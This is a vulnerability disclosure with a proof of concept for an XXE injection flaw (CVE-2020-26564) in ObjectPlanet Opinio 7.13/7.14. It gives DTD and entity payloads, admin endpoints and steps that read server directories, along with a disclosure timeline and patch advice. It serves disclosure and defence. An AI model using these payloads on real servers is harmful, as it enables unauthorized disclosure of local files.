ObjectPlanet Opinio 7.13 / 7.14 XML Injection

`# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng  
# CVE: CVE-2020-26564  
  
# Exploit Title: ObjectPlanet Opinio version 7.13/7.14 allows XXE injection  
# Vendor Homepage: https://www.objectplanet.com/opinio/  
# Software Link: https://www.objectplanet.com/opinio/  
# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng  
# CVE: CVE-2020-26564  
  
# Timeline  
- September 2020: Initial discovery  
- October 2020: Reported to ObjectPlanet  
- November 2020: Fix/patch provided by ObjectPlanet  
- July 2021: CVE-2020-26564  
  
# 1. Introduction  
Opinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed.  
  
# 2. Vulnerability Details  
ObjectPlanet Opinio before version 7.13 and 7.14 is vulnerable to XXE injection.  
  
# 3. Proof of Concept  
  
### XXE leading to local file disclosure ###  
  
Step 1:   
  
URL: /opinio/admin/file.do?action=viewEditFileResource&resourceType=6&resourcePatch=upload/css/common/blueSurvey.css  
  
Opinio allows an administrative user to edit local CSS files, this is used to change the contents of a CSS file to a dtd reference file for the XXE injection  
The existing blueSurvey.css file was chosen for this PoC. Replace the contents of the file with:   
  
<!ENTITY all "%start;%file;%end;">  
  
-------------------------------------------------------  
  
Step 2:   
  
Utilize Opinios survey module and create a generic survey template. Export the template .xml file and add this snippet into the top of the .xml file:  
  
<!ENTITY % file SYSTEM "file:////C:\Users\">  
<!ENTITY % start "<![CDATA[">  
<!ENTITY % end "]]>">  
<!ENTITY % dtd SYSTEM  
"file:////C:\<BASE_DIRECTORY>\opinio\upload\css\common\blueSurvey.css">  
%dtd;  
  
Ensure the surveyIntro tag is inserted with the following payload (This will output the result in the  
surveyIntro field):  
  
<surveyIntro>&all;</surveyIntro>  
  
The base directory can be guessed via the information under Setup >> Edit System Settings , this page on Opinio shows the local directory of where Opinio was installed to.   
  
Import the modified .xml file to:   
/survey/admin/folderSurvey.do?action=viewImportSurvey['importFile']  
  
-------------------------------------------------------  
  
Step 3:   
  
The C:\Users\ directory can be viewed at :  
/opinio/admin/preview.do?action=previewSurvey&surveyId=<SURVEY_ID>  
  
  
This vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html  
  
  
# 4. Remediation  
Apply the latest fix/patch from objectplanet.  
  
# 5. Credits  
Timothy Tan (https://sg.linkedin.com/in/timtjh)  
Khor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/)  
Yu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/)  
Daniel Tan (https://www.linkedin.com/in/dantanjk/)  
`